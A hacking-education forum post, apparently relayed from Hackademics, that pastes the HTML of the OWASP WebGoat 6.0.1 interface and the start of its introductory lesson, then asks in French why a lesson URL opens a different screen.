<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->

<!-- CSS -->
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"/>
<!-- Bootstrap core CSS -->
<link rel="stylesheet" href="plugins/bootstrap/css/bootstrap.min.css"/>
<!-- Fonts from Font Awsome -->
<link rel="stylesheet" href="css/font-awesome.min.css"/>
<!-- CSS Animate -->
<link rel="stylesheet" href="css/animate.css"/>
<!-- Custom styles for this theme -->
<link rel="stylesheet" href="css/main.css"/>
<!-- end of CSS -->

<!-- JS -->
<script src="js/jquery/jquery-1.10.2.min.js"></script>
<script src="js/angular/angular.min.js"></script>
<!-- angular modules -->
<script src="js/angular/angular-animate.min.js"></script>
<script src="js/angular/ui-bootstrap-tpls-0.11.0.min.js"></script>
<!-- Feature detection -->
<script src="js/modernizr-2.6.2.min.js"></script>
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="js/html5shiv.js"></script>
<script src="js/respond.min.js"></script>
<![endif]-->

<!--Global JS-->

<script src="js/jquery_form/jquery.form.js"></script>
<script src="plugins/bootstrap/js/bootstrap.min.js"></script>

<script src="js/application.js"></script>
<script type="text/javascript">
var goat = angular.module("goatApp", ['ngAnimate', 'ui.bootstrap']);
</script>
<script type="text/javascript" src="js/goatConstants.js"></script>
<script type="text/javascript" src="js/goatUtil.js"></script>
<script type="text/javascript" src="js/goatData.js"></script>
<script type="text/javascript" src="js/goatLesson.js"></script>
<script type="text/javascript" src="js/goatControllers.js"></script>
<!-- end of JS -->



<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>WebGoat</title>
</head>

<body class="animated fadeIn" ng-app="goatApp">
<section id="container" ng-controller="goatLesson">
<header id="header">
<!--logo start-->
<div class="brand">
<a href="/WebGoat/start.mvc" class="logo"><span>Web</span>Goat</a>
</div>
<!--logo end-->
<div class="toggle-navigation toggle-left">
<button type="button" class="btn btn-default" id="toggle-left" data-toggle="tooltip" data-placement="right" title="Toggle Navigation">
<i class="fa fa-bars"></i>
</button>
</div><!--toggle navigation end-->
<div class="lessonTitle" >
<h1 id="lessonTitle"></h1>
</div><!--lesson title end-->
<div class="user-nav pull-right" style="margin-right: 75px;">
<div class="dropdown" style="display:inline">
<button type="button" class="btn btn-default dropdown-toggle" id="dropdownMenu1" ng-disabled="disabled">
<i class="fa fa-user"></i> <span class="caret"></span>
</button>
<ul class="dropdown-menu dropdown-menu-left" role="menu" aria-labelledby="dropdownMenu1">
<li role="presentation"><a role="menuitem" tabindex="-1" href="j_spring_security_logout">Logout</a></li>
<li role="presentation" class="divider"></li>
<li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">User: guest</a></li>
<li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">Role: webgoat_user</a></li>
<li role="presentation" class="divider"></li>
<li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">6.0.1</a></li>
<li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">Build: 14</a></li>

</ul>
</div>
<button type="button" class="btn btn-default right_nav_button" ng-click="showAbout()" data-toggle="tooltip" title="About WebGoat">
<i class="fa fa-info"></i>
</button>
<a href="mailto:webgoat@owasp.org?Subject=Webgoat%20feedback" target="_top">
<button type="button" class="btn btn-default right_nav_button"data-toggle="tooltip" title="Contact Us">
<i class="fa fa-envelope"></i>
</button>
</a>


</div>
</header>

<!--sidebar left start-->
<aside class="sidebar" >
<div id="leftside-navigation" ng-controller="goatMenu" class="nano">
<ul class="nano-content">
<li class="sub-menu" ng-repeat="item in menuTopics">
<a ng-click="accordionMenu(item.id)" href=""><i class="fa {{item.class}}"></i><span>{{item.name}}</span></a><!-- expanded = !expanded-->
<ul class="slideDown lessonsAndStages {{item.displayClass}}" id="{{item.id}}" isOpen=0>
<li ng-repeat="lesson in item.children" class="{{lesson.selectedClass}}">
<a ng-click="renderLesson(lesson.id, lesson.link, {showSource: lesson.showSource, showHints: lesson.showHints})" id="{{lesson.id}}" class="{{lesson.selectedClass}}" title="link to {{lesson.name}}" href="">{{lesson.name}}</a><span class="{{lesson.completeClass}}"></span>
<span ng-repeat="stage in lesson.children">
<a ng-click="renderLesson(stage.id, stage.link, {showSource: stage.showSource, showHints: stage.showHints})" class="selectedClass" id="{{stage.id}}" title="link to {{stage.name}}" href="">{{stage.name}}</a><span class="{{stage.completeClass}}"></span>
</span>
</li>
</ul>
</li>
</ul>
</div>

</aside>
<!--sidebar left end-->
<!--main content start-->
<section class="main-content-wrapper">
<section id="main-content" > <!--ng-controller="goatLesson"-->
<div class="row">
<div class="col-md-8">
<div class="col-md-12" align="left">
<div class="panel">
<div class="panel-body">
<button type="button" id="showSourceBtn" ng-show="showSource" class="btn btn-primary btn-xs" ng-click="showLessonSource()">Java [Source]</button>
<button type="button" id="showSolutionBtn" class="btn btn-primary btn-xs" ng-click="showLessonSolution()">Solution</button>
<button type="button" id="showPlanBtn" class="btn btn-primary btn-xs" ng-click="showLessonPlan()">Lesson Plan</button>
<button type="button" id="showHintsBtn" ng-show="showHints" class="btn btn-primary btn-xs" ng-click="viewHints()">Hints</button>
<button type="button" id="restartLessonBtn" class="btn btn-xs" ng-click="restartLesson()">Restart Lesson</button>
</div>
</div>
<div class="lessonHelp" id="lesson_hint_row">
<h4>Hints</h4>
<div class="panel" >
<div class="panel-body" id="lesson_hint">
<span class="glyphicon-class glyphicon glyphicon-circle-arrow-left" id="showPrevHintBtn" ng-click="viewPrevHint()"></span>
<span class="glyphicon-class glyphicon glyphicon-circle-arrow-right" id="showNextHintBtn" ng-click="viewNextHint()"></span>
<br/>
<span ng-show="showHints" bind-html-unsafe="curHint"></span>
<!--<span id="curHintContainer"></span>-->
</div>
</div>
</div>
</div>

<div class="col-md-12">
<div class="panel" >
<div class="panel-body" id="lesson_content">
<b>This should default to the "How to Work with Webgoat" lesson</b>
</div>

</div>
</div>
</div><!--col-md-8 end-->
<div class="col-md-4">
<div class="col-md-12">
<div class="panel">
<div class="panel-body">
<div align="left">
<h3>Cookies / Parameters</h3>
</div>
<hr />
<div id="cookiesAndParamsView">
<div class="cookiesView">
<h4>Cookies</h4>
<div class="cookieContainer" ng-repeat="cookie in cookies">
<table class="cookieTable table-striped table-nonfluid" >
<thead>
<tr><th class="col-sm-1"></th><th class="col-sm-1"></th></tr> <!-- Field / Value -->
</thead>
<tbody>
<tr ng-repeat="(key, value) in cookie">
<td>{{key}}</td>
<td>{{value}}</td>
</tr>
</tbody>
<!--<li ng-repeat="(key, value) in cookie">{{key}} :: {{ value}} </td>-->
<!--</ul>-->
</table>
</div>
</div>
<div id="paramsView"> <!--class="paramsView"-->
<h4>Params</h4>
<table class="paramsTable table-striped table-nonfluid" id="paramsTable">
<thead>
<tr><th>Param</th><th>Value</th></tr>
</thead>
<tbody>
<tr ng-repeat="param in parameters">
<td>{{param.name}}</td>
<td>{{param.value}}</td>
</tr>
</tbody>
</table>
</ul>
</div>
</div>
</div>
</div>
</div>
</div><!--col-md-4 end-->
</div>
<div id="lessonHelpsWrapper">
<!--div class="row lessonHelp" id="lesson_hint_row">
<div class="col-md-12">
<h4>Hints</h4>
<div class="panel" >
<div class="panel-body" id="lesson_hint">
<span class="glyphicon-class glyphicon glyphicon-circle-arrow-left" id="showPrevHintBtn" ng-click="viewPrevHint()"></span>
<span class="glyphicon-class glyphicon glyphicon-circle-arrow-right" id="showNextHintBtn" ng-click="viewNextHint()"></span>
<br/>
{{curHint}}
</div>
</div>
</div>
</div-->
<div class="row lessonHelp" id="lesson_cookies_row">
<div class="col-md-12">
<h4>Lesson Parameters and Cookies</h4>
<div class="panel" >
<div class="panel-body" id="lesson_cookies">

</div>
</div>
</div>
</div>
<div class="row lessonHelp" id="lesson_hint_row">
<div class="col-md-12">
<h4>Lesson Hints</h4>
<div class="panel" >
<div class="panel-body" id="lesson_hint">

</div>
</div>
</div>
</div>
<div class="row lessonHelp" id="lesson_plan_row">
<div class="col-md-12">
<h4>Lesson Plan</h4>
<div class="panel" >
<div class="panel-body" id="lesson_plan">
<!-- allowing jQuery to handle this one -->
</div>
</div>
</div>
</div>
<div class="row lessonHelp" id="lesson_solution_row">
<div class="col-md-12">
<h4>Lesson Solution</h4>
<div class="panel">
<div class="panel-body" id="lesson_solution">
</div>
</div>
</div>
</div>
<div class="row lessonHelp" id="lesson_source_row">
<div class="col-md-12">
<h4>Lesson Source Code</h4>
<div class="panel">
<div class="panel-body" id="lesson_source">
<pre>{{source}}</pre>
</div>
</div>
</div>
</div>
</div>
</section>
</section>

<!--main content end-->

</section>

<!--main content end-->

</section>

<script>
$(document).ready(function() {
//TODO merge appliction.js code into other js files
app.init();
});
</script>

<!-- About WebGoat Modal -->
<div class="modal fade" id="aboutModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<div class="modal-dialog modal-lg">
<div class="modal-content">


<!-- This modal content is included into the main_new.jsp -->

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
<h3 class="modal-title" id="myModalLabel">About WebGoat - Provided by the OWASP Foundation</h3>
</div>
<div class="modal-body modal-scroll">
<p>Thanks for hacking The Goat!</p>
<p>WebGoat is a demonstration of common web application flaws. The
associated exercises are intended to provide hands-on experience with
techniques aimed at demonstrating and testing application penetration.
</p>
<p>From the entire WebGoat team, we appreciate your interest and efforts
in making applications not just better, but safer and more secure for
everyone. We, as well as our sacrificial goat, thank you.</p>
<p>
Version: 6.0.1,&nbsp;Build: 14
</p>

<div class="row">
<div class="col-md-6">
<p>Contact us:
<ul>
<li>WebGoat mailing list: owasp-webgoat@lists.owasp.org</li>
<li>Bruce Mayhew: webgoat@owasp.org</li>
</ul>
</p>
</div>
</div>
<div class="row">
<div class="col-md-6">
<p>WebGoat Authors
<ul>
<li>Bruce Mayhew (Project Lead)</li>
<li>Jeff Williams (Original Idea)</li>
<li>Richard Lawson (Architect)</li>
<li>Jason White (Architect)</li>
</ul>
</p>
</div>
<div class="col-md-6">
<p>WebGoat Design Team
<ul>
<li>Richard Lawson</li>
<li>Bruce Mayhew</li>
<li>Jason White</li>
<li>Ali Looney (User Interface)</li>
<li>Jeff Wayman (Website and Docs)</li>
</ul>
</p>
</div>
</div>
<div class="row">
<div class="col-md-6">
<p>Active Contributors
<ul>
<li>Nanne Baars (Developer)</li>
<li>Dave Cowden (Everything)</li>
<li>Keith Gasser (Survey/Security)</li>
<li>Devin Mayhew (Setup/Admin)</li>
<li>Li Simon (Developer)</li>
</ul>
</p>
</div>
<div class="col-md-6">
<p>Past Contributors
<ul>
<li>David Anderson (Developer/Design)</li>
<li>Christopher Blum (Lessons)</li>
<li>Laurence Casey (Graphics)</li>
<li>Brian Ciomei (Bug fixes)</li>
<li>Rogan Dawes (Lessons)</li>
<li>Erwin Geirnaert (Solutions)</li>
<li>Aung Knant (Documentation)</li>
<li>Ryan Knell (Lessons)</li>
<li>Christine Koppeit (Build)</li>
<li>Sherif Kousa (Lessons/Documentation)</li>
<li>Reto Lippuner (Lessons)</li>
<li>PartNet (Lessons)</li>
<li>Yiannis Pavlosoglou (Lessons)</li>
<li>Eric Sheridan (Lessons)</li>
<li>Alex Smolen (Lessons)</li>
<li>Chuck Willis (Lessons)</li>
<li>Marcel Wirth (Lessons)</li>
</ul>
</p>
<p>Did we miss you? Our sincere apologies, as we know there have
been many contributors over the years. If your name does not
appear in any of the lists above, please send us a note. We'll
get you added with no further sacrifices required.</p>
</div>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
</div>
</div>

</div>
</div>
</div>
</body>
</html>

=====================================================================
=====================================================================
\OPENING: http://localhost:9090/WebGoat/attack...n=20&menu=1100
=====================================================================

SOURCE:




<!-- HTML fragment correpsonding to the lesson content -->


<div id="lessonContent">

<h1>How To Work With WebGoat</h1>
<p>
Welcome to a brief overview of WebGoat.<br>
</p>
<h2>Environment Information</h2>
<p>
WebGoat uses the Apache Tomcat server but can run in any application server. It is configured to run on
localhost although this can be easily changed, see the "Tomcat Configuration" section in the Introduction. </p>

<h2>The WebGoat Interface</h2>
<p>
<img src="images/introduction/interface.png"><br><br>
1. Lesson Cate
=====================================================================
vous voyez a la fin la ou je demandes d’accéder a http://localhost:9090/WebGoat/attack...n=20&menu=1100 il n’accède pas a la page demandée page mais a celle ci http://localhost:9090/WebGoat/attack?Screen=21&menu=5 comme je vous montre dans ces deux copies d'écran que vous pouvez comparer a la sortie dans le shell

Les copies:
138487Capturedcrande20151122135103.jpg944133Capturedcrande20151122135041.jpg

Si quelqu'un a une idée je lui en serait très reconnaissant :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SSm9d1
via IFTTT